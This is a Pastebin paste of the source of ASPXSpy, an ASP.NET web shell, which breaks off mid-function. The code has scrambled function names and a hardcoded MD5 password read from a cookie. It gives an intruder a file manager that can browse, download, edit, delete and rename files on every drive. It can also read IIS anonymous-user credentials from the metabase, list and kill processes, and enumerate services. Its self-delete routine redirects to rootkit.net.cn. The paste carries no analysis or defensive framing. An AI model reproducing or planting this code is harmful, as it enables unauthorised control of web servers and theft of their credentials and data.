SHARE
TWEET

Untitled

a guest Mar 20th, 2017 36 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
  2. <%@ import Namespace="System.IO"%>
  3. <%@ import Namespace="System.Diagnostics"%>
  4. <%@ import Namespace="System.Data"%>
  5. <%@ import Namespace="System.Management"%>
  6. <%@ import Namespace="System.Data.OleDb"%>
  7. <%@ import Namespace="Microsoft.Win32"%>
  8. <%@ import Namespace="System.Net.Sockets" %>
  9. <%@ import Namespace="System.Net" %>
  10. <%@ import Namespace="System.Runtime.InteropServices"%>
  11. <%@ import Namespace="System.DirectoryServices"%>
  12. <%@ import Namespace="System.ServiceProcess"%>
  13. <%@ import Namespace="System.Text.RegularExpressions"%>
  14. <%@ Import Namespace="System.Threading"%>
  15. <%@ Import Namespace="System.Data.SqlClient"%>
  16. <%@ import Namespace="Microsoft.VisualBasic"%>
  17. <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  18. <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  19. <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  20. <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
  21. <script runat="server">
  22.     // The following variables are visible to all procedures
  23.     // within the <script> block.
  24.     String str;
  25.     int i;
  26.     int i2;
  27.  
  28.     int DoubleIt(int inpt)
  29.     {
  30.         // The following variable is visible only within
  31.         // the DoubleIt procedure.
  32.         int factor = 2;
  33.  
  34.         return inpt * factor;
  35.     }
  36.  
  37. public string Password="21232f297a57a5a743894a0e4a801fc3";//admin
  38. public string vbhLn="ASPXSpy";
  39. public int TdgGU=1;
  40. protected OleDbConnection Dtdr=new OleDbConnection();
  41. protected OleDbCommand Kkvb=new OleDbCommand();
  42. public NetworkStream NS=null;
  43. public NetworkStream NS1=null;
  44. TcpClient tcp=new TcpClient();
  45. TcpClient zvxm=new TcpClient();
  46. ArrayList IVc=new ArrayList();
  47. protected void Page_load(object sender,EventArgs e)
  48. {
  49. YFcNP(this);
  50. fhAEn();
  51. if (!pdo())
  52. {
  53. return;
  54. }
  55. if(IsPostBack)
  56. {
  57. string tkI=Request["__EVENTTARGET"];
  58. string VqV=Request["__File"];
  59. if(tkI!="")
  60. {
  61. switch(tkI)
  62. {
  63. case "Bin_Parent":
  64. krIR(Ebgw(VqV));
  65. break;
  66. case "Bin_Listdir":
  67. krIR(Ebgw(VqV));
  68. break;
  69. case "kRXgt":
  70. kRXgt(Ebgw(VqV));
  71. break;
  72. case "Bin_Createfile":
  73. gLKc(VqV);
  74. break;
  75. case "Bin_Editfile":
  76. gLKc(VqV);
  77. break;
  78. case "Bin_Createdir":
  79. stNPw(VqV);
  80. break;
  81. case "cYAl":
  82. cYAl(VqV);
  83. break;
  84. case "ksGR":
  85. ksGR(Ebgw(VqV));
  86. break;
  87. case "SJv":
  88. SJv(VqV);
  89. break;
  90. case "Bin_Regread":
  91. tpRQ(Ebgw(VqV));
  92. break;
  93. case "hae":
  94. hae();
  95. break;
  96. case "urJG":
  97. urJG(VqV);
  98. break;
  99. }
  100. if(tkI.StartsWith("dAJTD"))
  101. {
  102. dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
  103. }
  104. else if(tkI.StartsWith("Tlvz"))
  105. {
  106. Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
  107. }
  108. else if(tkI.StartsWith("Bin_CFile"))
  109. {
  110. YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
  111. }
  112. }
  113. }
  114. else
  115. {
  116. PBZw();
  117. }
  118. }
  119. public bool pdo()
  120. {
  121. if(Request.Cookies[vbhLn]==null)
  122. {
  123. tZSx();
  124. return false;
  125. }
  126. else
  127. {
  128. if (Request.Cookies[vbhLn].Value != Password)
  129. {
  130. tZSx();
  131. return false;
  132. }
  133. else
  134. {
  135. return true;
  136. }
  137. }
  138. }
  139. public void tZSx()
  140. {
  141. ljtzC.Visible=true;
  142. ZVS.Visible=false;
  143. }
  144. protected void YKpI(object sender,EventArgs e)
  145. {
  146. Session.Abandon();
  147. Response.Cookies.Add(new HttpCookie(vbhLn,null));
  148. tZSx();
  149. }
  150. public void PBZw()
  151. {
  152. ZVS.Visible=true;
  153. ljtzC.Visible=false;
  154. Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
  155. Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
  156. Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
  157. Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
  158. Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
  159. if (AXSbb.Value==string.Empty)
  160. {
  161. AXSbb.Value=OElM(Server.MapPath("."));
  162. }
  163. Bin_H2_Title.InnerText="File Manager >>";
  164. krIR(AXSbb.Value);
  165. }
  166. public void fhAEn()
  167. {
  168. try
  169. {
  170. string[] YRgt=Directory.GetLogicalDrives();
  171. for(int i=0;i<YRgt.Length;i++)
  172. {
  173. Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
  174. Bin_Span_Drv.Controls.Add(c);
  175. LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
  176. nxeDR.Command+=new CommandEventHandler(this.iVk);
  177. }
  178. }catch(Exception ex){}
  179. }
  180. public string OElM(string path)
  181. {
  182. if(path.Substring(path.Length-1,1)!=@"\")
  183. {
  184. path=path+@"\";
  185. }
  186. return path;
  187. }
  188. public string nrrx(string path)
  189. {
  190. char[] trim={'\\'};
  191. if(path.Substring(path.Length-1,1)==@"\")
  192. {
  193. path=path.TrimEnd(trim);
  194. }
  195. return path;
  196. }
  197. [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
  198. public static extern int OMZP(string nDrive);
  199. public string mFvj(string instr)
  200. {
  201. string EuXD=string.Empty;
  202. int num=OMZP(instr);
  203. switch(num)
  204. {
  205. case 1:
  206. EuXD="Unknow("+instr+")";
  207. break;
  208. case 2:
  209. EuXD="Removable("+instr+")";
  210. break;
  211. case 3:
  212. EuXD="Fixed("+instr+")";
  213. break;
  214. case 4:
  215. EuXD="Network("+instr+")";
  216. break;
  217. case 5:
  218. EuXD="CDRom("+instr+")";
  219. break;
  220. case 6:
  221. EuXD="RAM Disk("+instr+")";
  222. break;
  223. }
  224. return EuXD.Replace(@"\","");
  225. }
  226. public string MVVJ(string instr)
  227. {
  228. byte[] tmp=Encoding.Default.GetBytes(instr);
  229. return Convert.ToBase64String(tmp);
  230. }
  231. public string Ebgw(string instr)
  232. {
  233. byte[] tmp=Convert.FromBase64String(instr);
  234. return Encoding.Default.GetString(tmp);
  235. }
  236. public void krIR(string path)
  237. {
  238. WICxe();
  239. CzfO.Visible=true;
  240. Bin_H2_Title.InnerText="File Manager >>";
  241. AXSbb.Value=OElM(path);
  242. DirectoryInfo GQMM=new DirectoryInfo(path);
  243. if(Directory.GetParent(nrrx(path))!=null)
  244. {
  245. string bg=OKM();
  246. TableRow p=new TableRow();
  247. for(int i=1;i<6;i++)
  248. {
  249. TableCell pc=new TableCell();
  250. if(i==1)
  251. {
  252. pc.Width=Unit.Parse("2%");
  253. pc.Text="0";
  254. p.CssClass=bg;
  255. }
  256. if(i==2)
  257. {
  258. pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
  259. }
  260. p.Cells.Add(pc);
  261. UGzP.Rows.Add(p);
  262. }
  263. }
  264. try
  265. {
  266. int vLlH=0;
  267. foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
  268. {
  269. string bg=OKM();
  270. vLlH++;
  271. TableRow tr=new TableRow();
  272. TableCell tc=new TableCell();
  273. tc.Width=Unit.Parse("2%");
  274. tc.Text="0";
  275. tr.Attributes["onmouseover"]="this.className='focus';";
  276. tr.CssClass=bg;
  277. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  278. tr.Cells.Add(tc);
  279. TableCell HczyN=new TableCell();
  280. HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
  281. tr.Cells.Add(HczyN);
  282. TableCell LYZK=new TableCell();
  283. LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
  284. tr.Cells.Add(LYZK);
  285. UGzP.Rows.Add(tr);
  286. TableCell ERUL=new TableCell();
  287. ERUL.Text="--";
  288. tr.Cells.Add(ERUL);
  289. UGzP.Rows.Add(tr);
  290. TableCell ZGKh=new TableCell();
  291. ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
  292. tr.Cells.Add(ZGKh);
  293. UGzP.Rows.Add(tr);
  294. }
  295. TableRow cKVA=new TableRow();
  296. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
  297. cKVA.Attributes["bgcolor"]="#dddddd";
  298. TableCell JlmW=new TableCell();
  299. JlmW.Attributes["colspan"]="6" ;
  300. JlmW.Attributes["height"]="5";
  301. cKVA.Cells.Add(JlmW);
  302. UGzP.Rows.Add(cKVA);
  303. int aYRwo=0;
  304. foreach(FileInfo Bin_Files in GQMM.GetFiles())
  305. {
  306. aYRwo++;
  307. string gb=OKM();
  308. TableRow tr=new TableRow();
  309. TableCell tc=new TableCell();
  310. tc.Width=Unit.Parse("2%");
  311. tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
  312. tr.Attributes["onmouseover"]="this.className='focus';";
  313. tr.CssClass=gb;
  314. tr.Attributes["onmouseout"]="this.className='"+gb+"';";
  315. tr.Cells.Add(tc);
  316. TableCell filename=new TableCell();
  317. if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
  318. {
  319. string url=Request.Url.ToString();
  320. filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
  321. }
  322. else
  323. {
  324. filename.Text=Bin_Files.Name;
  325. }
  326. TableCell albt=new TableCell();
  327. albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
  328. TableCell YzK=new TableCell();
  329. YzK.Text=mTG(Bin_Files.Length);
  330. TableCell GLpi=new TableCell();
  331. GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
  332. tr.Cells.Add(filename);
  333. tr.Cells.Add(albt);
  334. tr.Cells.Add(YzK);
  335. tr.Cells.Add(GLpi);
  336. UGzP.Rows.Add(tr);
  337. }
  338. string lgb=OKM();
  339. TableRow oWam=new TableRow();
  340. oWam.CssClass=lgb;
  341. for(int i=1;i<4;i++)
  342. {
  343. TableCell lGV=new TableCell();
  344. if(i==1)
  345. {
  346. lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
  347. }
  348. if(i==2)
  349. {
  350. lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
  351. }
  352. if(i==3)
  353. {
  354. lGV.ColumnSpan=4;
  355. lGV.Style.Add("text-align","right");
  356. lGV.Text=vLlH+" directories/ "+aYRwo+" files";
  357. }
  358. oWam.Cells.Add(lGV);
  359. }
  360. UGzP.Rows.Add(oWam);
  361. }
  362. catch(Exception error)
  363. {
  364. xseuB(error.Message);
  365. }
  366. }
  367. public string OKM()
  368. {
  369. TdgGU++;
  370. if(TdgGU % 2==0)
  371. {
  372. return "alt1";
  373. }
  374. else
  375. {
  376. return "alt2";
  377. }
  378. }
  379. public void kRXgt(string qcKu)
  380. {
  381. try
  382. {
  383. Directory.Delete(qcKu,true);
  384. xseuB("Directory delete new success !");
  385. }
  386. catch(Exception error)
  387. {
  388. xseuB(error.Message);
  389. }
  390. krIR(Directory.GetParent(qcKu).ToString());
  391. }
  392. public void dAJTD(string sdir,string ddir)
  393. {
  394. try
  395. {
  396. Directory.Move(sdir,ddir);
  397. xseuB("Directory Renamed Success !");
  398. }
  399. catch(Exception error)
  400. {
  401. xseuB(error.Message);
  402. }
  403. krIR(AXSbb.Value);
  404. }
  405. public void Tlvz(string sfile,string dfile)
  406. {
  407. try
  408. {
  409. File.Move(sfile,dfile);
  410. xseuB("File Renamed Success !");
  411. }
  412. catch(Exception error)
  413. {
  414. xseuB(error.Message);
  415. }
  416. krIR(AXSbb.Value);
  417. }
  418. public void YByN(string spath,string dpath)
  419. {
  420. try
  421. {
  422. File.Copy(spath,dpath);
  423. xseuB("File Copy Success !");
  424. }
  425. catch(Exception error)
  426. {
  427. xseuB(error.Message);
  428. }
  429. krIR(AXSbb.Value);
  430. }
  431. public void stNPw(string path)
  432. {
  433. try
  434. {
  435. Directory.CreateDirectory(AXSbb.Value+path);
  436. xseuB("Directory created success !");
  437. }
  438. catch(Exception error)
  439. {
  440. xseuB(error.Message);
  441. }
  442. krIR(AXSbb.Value);
  443. }
  444. public void gLKc(string path)
  445. {
  446. if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
  447. {
  448. foreach(ListItem item in NdCX.Items)
  449. {
  450. if(item.Selected=true)
  451. {
  452. item.Selected=false;
  453. }
  454. }
  455. }
  456. Bin_H2_Title.InnerHtml="Create/ Edit File >>";
  457. WICxe();
  458. vrFA.Visible=true;
  459. if(path.IndexOf(":")< 0)
  460. {
  461. Sqon.Value=AXSbb.Value+path;
  462. }
  463. else
  464. {
  465. Sqon.Value=path;
  466. }
  467. if(File.Exists(Sqon.Value))
  468. {
  469. StreamReader sr;
  470. if(NdCX.SelectedItem.Text=="UTF-8")
  471. {
  472. sr=new StreamReader(Sqon.Value,Encoding.UTF8);
  473. }
  474. else
  475. {
  476. sr=new StreamReader(Sqon.Value,Encoding.Default);
  477. }
  478. Xgvv.InnerText=sr.ReadToEnd();
  479. sr.Close();
  480. }
  481. else
  482. {
  483. Xgvv.InnerText=string.Empty;
  484. }
  485. }
  486. public void ksGR(string path)
  487. {
  488. FileInfo fs=new FileInfo(path);
  489. Response.Clear();
  490. Page.Response.ClearHeaders();
  491. Page.Response.Buffer=false;
  492. this.EnableViewState=false;
  493. Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
  494. Response.AddHeader("Content-Length",fs.Length.ToString());
  495. Page.Response.ContentType="application/unknown";
  496. Response.WriteFile(fs.FullName);
  497. Page.Response.Flush();
  498. Page.Response.Close();
  499. Response.End();
  500. Page.Response.Clear();
  501. }
  502. public void SJv(string path)
  503. {
  504. try
  505. {
  506. string[] spdT=path.Split(',');
  507. for(int i=0;i<spdT.Length-1;i++)
  508. {
  509. File.Delete(AXSbb.Value+Ebgw(spdT[i]));
  510. }
  511. xseuB("File Delete Success !");
  512. }
  513. catch(Exception error)
  514. {
  515. xseuB(error.Message);
  516. }
  517. krIR(AXSbb.Value);
  518. }
  519. public void hae()
  520. {
  521. try
  522. {
  523. File.Delete(Request.PhysicalPath);
  524. Response.Redirect("http://www.rootkit.net.cn");
  525. }
  526. catch(Exception error)
  527. {
  528. xseuB(error.Message);
  529. }
  530. }
  531. public void cYAl(string path)
  532. {
  533. Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
  534. WICxe();
  535. zRyG.Visible=true;
  536. QiFB.Value=AXSbb.Value+path;
  537. lICp.Value=AXSbb.Value;
  538. pWVL.Value=AXSbb.Value+path;
  539. string Att=File.GetAttributes(QiFB.Value).ToString();
  540. if(Att.LastIndexOf("ReadOnly")!=-1)
  541. {
  542. ZhWSK.Checked=true;
  543. }
  544. if(Att.LastIndexOf("System")!=-1)
  545. {
  546. SsR.Checked=true;
  547. }
  548. if(Att.LastIndexOf("Hidden")!=-1)
  549. {
  550. ccB.Checked=true;
  551. }
  552. if(Att.LastIndexOf("Archive")!=-1)
  553. {
  554. fbyZ.Checked=true;
  555. }
  556. yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
  557. uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
  558. aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
  559. }
  560. public static String mTG(Int64 fileSize)
  561. {
  562. if(fileSize<0)
  563. {
  564. throw new ArgumentOutOfRangeException("fileSize");
  565. }
  566. else if(fileSize >= 1024 * 1024 * 1024)
  567. {
  568. return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
  569. }
  570. else if(fileSize >= 1024 * 1024)
  571. {
  572. return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
  573. }
  574. else if(fileSize >= 1024)
  575. {
  576. return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
  577. }
  578. else
  579. {
  580. return string.Format("{0} B",fileSize);
  581. }
  582. }
  583. private bool SGde(string sSrc)
  584. {
  585. Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
  586. if(reg.IsMatch(sSrc))
  587. {
  588. return true;
  589. }
  590. else
  591. {
  592. return false;
  593. }
  594. }
  595. public void AdCx()
  596. {
  597. string qcKu=string.Empty;
  598. string mWGEm="IIS://localhost/W3SVC";
  599. GlI.Style.Add("word-break","break-all");
  600. try
  601. {
  602. DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
  603. int fmW=0;
  604. foreach(DirectoryEntry child in HHzcY.Children)
  605. {
  606. if(SGde(child.Name.ToString()))
  607. {
  608. fmW++;
  609. DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
  610. DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
  611. string bg=OKM();
  612. TableRow TR=new TableRow();
  613. TR.Attributes["onmouseover"]="this.className='focus';";
  614. TR.CssClass=bg;
  615. TR.Attributes["onmouseout"]="this.className='"+bg+"';";
  616. TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
  617. for(int i=1;i<6;i++)
  618. {
  619. try
  620. {
  621. TableCell tfit=new TableCell();
  622. switch(i)
  623. {case 1:
  624. tfit.Text=fmW.ToString();
  625. break;
  626. case 2:
  627. tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
  628. break;
  629. case 3:
  630. tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
  631. break;
  632. case 4:
  633. StringBuilder sb=new StringBuilder();
  634. PropertyValueCollection pc=child.Properties["ServerBindings"];
  635. for (int j=0; j < pc.Count; j++)
  636. {
  637. sb.Append(pc[j].ToString()+"<br>");
  638. }
  639. tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
  640. break;
  641. case 5:
  642. tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
  643. break;
  644. }
  645. TR.Cells.Add(tfit);
  646. }
  647. catch (Exception ex)
  648. {
  649. xseuB(ex.Message);
  650. continue;
  651. }
  652. }
  653. GlI.Controls.Add(TR);
  654. }
  655. }
  656. }
  657. catch(Exception ex)
  658. {
  659. xseuB(ex.Message);
  660. }
  661. }
  662. public ManagementObjectCollection PhQTd(string query)
  663. {
  664. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
  665. return QS.Get();
  666. }
  667. public DataTable cCf(string query)
  668. {
  669. DataTable dt=new DataTable();
  670. int i=0;
  671. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
  672. try
  673. {
  674. foreach(ManagementObject m in QS.Get())
  675. {
  676. DataRow dr=dt.NewRow();
  677. PropertyDataCollection.PropertyDataEnumerator oEnum;
  678. oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
  679. while(oEnum.MoveNext())
  680. {
  681. PropertyData DRU=(PropertyData)oEnum.Current;
  682. if(dt.Columns.IndexOf(DRU.Name)==-1)
  683. {
  684. dt.Columns.Add(DRU.Name);
  685. dt.Columns[dt.Columns.Count-1].DefaultValue="";
  686. }
  687. if(m[DRU.Name]!=null)
  688. {
  689. dr[DRU.Name]=m[DRU.Name].ToString();
  690. }
  691. else
  692. {
  693. dr[DRU.Name]=string.Empty;
  694. }
  695. }
  696. dt.Rows.Add(dr);
  697. }
  698. }
  699. catch(Exception error)
  700. {
  701. }
  702. return dt;
  703. }
  704. public void YUw()
  705. {
  706. try
  707. {
  708. Bin_H2_Title.InnerText="Process >>";
  709. WICxe();
  710. DCbS.Visible=true;
  711. int UEbTI=0;
  712. Process[] p=Process.GetProcesses();
  713. foreach(Process sp in p)
  714. {
  715. UEbTI++;
  716. string bg=OKM();
  717. TableRow tr=new TableRow();
  718. tr.Attributes["onmouseover"]="this.className='focus';";
  719. tr.CssClass=bg;
  720. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  721. for(int i=1;i<7;i++)
  722. {
  723. TableCell td=new TableCell();
  724. if(i==1)
  725. {
  726. td.Width=Unit.Parse("2%");
  727. td.Text=UEbTI.ToString();
  728. tr.Controls.Add(td);
  729. }
  730. if(i==2)
  731. {
  732. td.Text=sp.Id.ToString();
  733. tr.Controls.Add(td);
  734. }
  735. if(i==3)
  736. {
  737. td.Text=sp.ProcessName.ToString();
  738. tr.Controls.Add(td);
  739. }
  740. if(i==4)
  741. {
  742. td.Text=sp.Threads.Count.ToString();
  743. tr.Controls.Add(td);
  744. }
  745. if(i==5)
  746. {
  747. td.Text=sp.BasePriority.ToString();
  748. tr.Controls.Add(td);
  749. }
  750. if(i==6)
  751. {
  752. td.Text="--";
  753. tr.Controls.Add(td);
  754. }
  755. }
  756. IjsL.Controls.Add(tr);
  757. }
  758. }
  759. catch(Exception error)
  760. {
  761. AIz();
  762. }
  763. AIz();
  764. }
  765. public void AIz()
  766. {
  767. try
  768. {
  769. Bin_H2_Title.InnerText="Process >>";
  770. WICxe();
  771. DCbS.Visible=true;
  772. int UEbTI=0;
  773. DataTable dt=cCf("Win32_Process");
  774. for(int j=0;j<dt.Rows.Count;j++)
  775. {
  776. UEbTI++;
  777. string bg=OKM();
  778. TableRow tr=new TableRow();
  779. tr.Attributes["onmouseover"]="this.className='focus';";
  780. tr.CssClass=bg;
  781. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  782. for(int i=1;i<7;i++)
  783. {
  784. TableCell td=new TableCell();
  785. if(i==1)
  786. {
  787. td.Width=Unit.Parse("2%");
  788. td.Text=UEbTI.ToString();
  789. tr.Controls.Add(td);
  790. }
  791. if(i==2)
  792. {
  793. td.Text=dt.Rows[j]["ProcessID"].ToString();
  794. tr.Controls.Add(td);
  795. }
  796. if(i==3)
  797. {
  798. td.Text=dt.Rows[j]["Name"].ToString();
  799. tr.Controls.Add(td);
  800. }
  801. if(i==4)
  802. {
  803. td.Text=dt.Rows[j]["ThreadCount"].ToString();
  804. tr.Controls.Add(td);
  805. }
  806. if(i==5)
  807. {
  808. td.Text=dt.Rows[j]["Priority"].ToString();
  809. tr.Controls.Add(td);
  810. }
  811. if(i==6)
  812. {
  813. if( dt.Rows[j]["CommandLine"]!=string.Empty)
  814. {
  815. td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
  816. }
  817. else
  818. {
  819. td.Text="--";
  820. }
  821. tr.Controls.Add(td);
  822. }
  823. }
  824. IjsL.Controls.Add(tr);
  825. }
  826. }
  827. catch(Exception error)
  828. {
  829. xseuB(error.Message);
  830. }
  831. }
  832. public void urJG(string pid)
  833. {
  834. try
  835. {
  836. foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
  837. {
  838. p.InvokeMethod("Terminate",null);
  839. p.Dispose();
  840. }
  841. xseuB("Process Kill Success !");
  842. }
  843. catch(Exception error)
  844. {
  845. xseuB(error.Message);
  846. }
  847. AIz();
  848. }
  849. public void oHpF()
  850. {
  851. try
  852. {
  853. Bin_H2_Title.InnerText="Services >>";
  854. WICxe();
  855. iQxm.Visible=true;
  856. int UEbTI=0;
  857. ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
  858. for(int i=0;i<kQmRu.Length;i++)
  859. {
  860. UEbTI++;
  861. string bg=OKM();
  862. TableRow tr=new TableRow();
  863. tr.Attributes["onmouseover"]="this.className='focus';";
  864. tr.CssClass=bg;
  865. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  866. for(int b=1;b<7;b++)
  867. {
  868. TableCell td=new TableCell();
  869. if(b==1)
  870. {
  871. td.Width=Unit.Parse("2%");
  872. td.Text=UEbTI.ToString();
  873. tr.Controls.Add(td);
  874. }
  875. if(b==2)
  876. {
  877. td.Text="null";
  878. tr.Controls.Add(td);
  879. }
  880. if(b==3)
  881. {
  882. td.Text=kQmRu[i].ServiceName.ToString();
  883. tr.Controls.Add(td);
  884. }
  885. if(b==4)
  886. {
  887. td.Text="";
  888. tr.Controls.Add(td);
  889. }
  890. if(b==5)
  891. {
  892. string kOIo=kQmRu[i].Status.ToString();
  893. if(kOIo=="Running")
  894. {
  895. td.Text="<font color=green>"+kOIo+"</font>";
  896. }
  897. else
  898. {
  899. td.Text="<font color=red>"+kOIo+"</font>";
  900. }
  901. tr.Controls.Add(td);
  902. }
  903. if(b==6)
  904. {
  905. td.Text="";
  906. tr.Controls.Add(td);
  907. }
  908. }
  909. vHCs.Controls.Add(tr);
  910. }
  911. }
  912. catch(Exception error)
  913. {
  914. xseuB(error.Message);
  915. }
  916. }
  917. public void tZRH()
  918. {
  919. try
  920. {
  921. Bin_H2_Title.InnerText="Services >>";
  922. WICxe();
  923. iQxm.Visible=true;
  924. int UEbTI=0;
  925. DataTable dt=cCf("Win32_Service");
  926. for(int j=0;j<dt.Rows.Count;j++)
  927. {
  928. UEbTI++;
  929. string bg=OKM();
  930. TableRow tr=new TableRow();
  931. tr.Attributes["onmouseover"]="this.className='focus';";
  932. tr.CssClass=bg;
  933. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  934. tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();
  935. for(int i=1;i<7;i++)
  936. {
  937. TableCell td=new TableCell();
  938. if(i==1)
  939. {
  940. td.Width=Unit.Parse("2%");
  941. td.Text=UEbTI.ToString();
  942. tr.Controls.Add(td);
  943. }
  944. if(i==2)
  945. {
  946. td.Text=dt.Rows[j]["ProcessID"].ToString();
  947. tr.Controls.Add(td);
  948. }
  949. if(i==3)
  950. {
  951. td.Text=dt.Rows[j]["Name"].ToString();
  952. tr.Controls.Add(td);
  953. }
  954. if(i==4)
  955. {
  956. td.Text=dt.Rows[j]["PathName"].ToString();
  957. tr.Controls.Add(td);
  958. }
  959. if(i==5)
  960. {
  961. string kOIo=dt.Rows[j]["State"].ToString();
  962. if(kOIo=="Running")
  963. {
  964. td.Text="<font color=green>"+kOIo+"</font>";
  965. }
  966. else
  967. {
  968. td.Text="<font color=red>"+kOIo+"</font>";
  969. }
  970. tr.Controls.Add(td);
  971. }
  972. if(i==6)
  973. {
  974. td.Text=dt.Rows[j]["StartMode"].ToString();
